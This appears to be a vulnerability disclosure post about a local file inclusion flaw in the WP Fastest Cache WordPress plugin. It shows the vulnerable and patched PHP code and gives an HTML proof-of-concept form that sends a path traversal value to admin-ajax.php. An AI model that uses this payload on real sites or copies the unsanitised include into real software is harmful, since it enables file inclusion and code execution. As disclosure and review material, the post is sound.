Protecting You Against Wordfence’s Bad Practices: Local File Inclusion Vulnerability in WP Fastest Cache
Wordfence is putting WordPress website at risk by disclosing vulnerabilities in plugins with critical details needed to double check their work missing, in what appears to be an attempt to profit off of these vulnerabilities. We are releasing those details so that others can review the vulnerabilities to try to limit the damage Wordfence’s practice could cause.
Wordfence describes the vulnerability in WP Fastest Cache version 0.8.5.7 as “The Local File Inclusion vulnerability allows an attacker to execute code on the target web server or on a site visitor’s browser. This enables the attacker to steal or manipulate data, perform a denial of service attack or enable additional attack types such as Cross Site Scripting.”
The relevant change in the next version was to restrict the AJAX accessible function wpfc_cdn_template_ajax_request_callback() to Administrator level users in the file /wpFastestCache.php .
Code in 0.8.5.7:
318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 | public function wpfc_cdn_template_ajax_request_callback(){ ob_start(); include_once(WPFC_MAIN_PATH."templates/cdn/".$_POST["id"].".php"); $content = ob_get_contents(); ob_end_clean(); $res = array("success" => false, "content" => ""); if($data = @file_get_contents(WPFC_MAIN_PATH."templates/cdn/".$_POST["id"].".php")){ $res["success"] = true; $res["content"] = $content; } echo json_encode($res); exit; } |
Code in 0.8.5.8:
327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 | public function wpfc_cdn_template_ajax_request_callback(){ if(current_user_can('manage_options')){ ob_start(); include_once(WPFC_MAIN_PATH."templates/cdn/".$_POST["id"].".php"); $content = ob_get_contents(); ob_end_clean(); $res = array("success" => false, "content" => ""); if($data = @file_get_contents(WPFC_MAIN_PATH."templates/cdn/".$_POST["id"].".php")){ $res["success"] = true; $res["content"] = $content; } echo json_encode($res); exit; }else{ wp_die("Must be admin"); } } |
Wordfence’s description notably doesn’t mention that the attacker needs to be logged in to WordPress to exploit this, which severely limits the severity of the vulnerability.
Proof of Concept
The following proof of concept will cause a file named test.php located in the root directory of the WordPress installation to be included.
Make sure you are logged in to WordPress, ideally as a subscriber since they have the least capabilities. Also, make sure to replace “[path to WordPress]” with the location of WordPress
<html> <body> <form action="http://[path to WordPress]/wp-admin/admin-ajax.php"; method="POST"> <input type="hidden" name="action" value="wpfc_cdn_template_ajax_request" /> <input type="hidden" name="id" value="../../../../../test" /> <input type="submit" value="Submit" /> </form> </body> </html>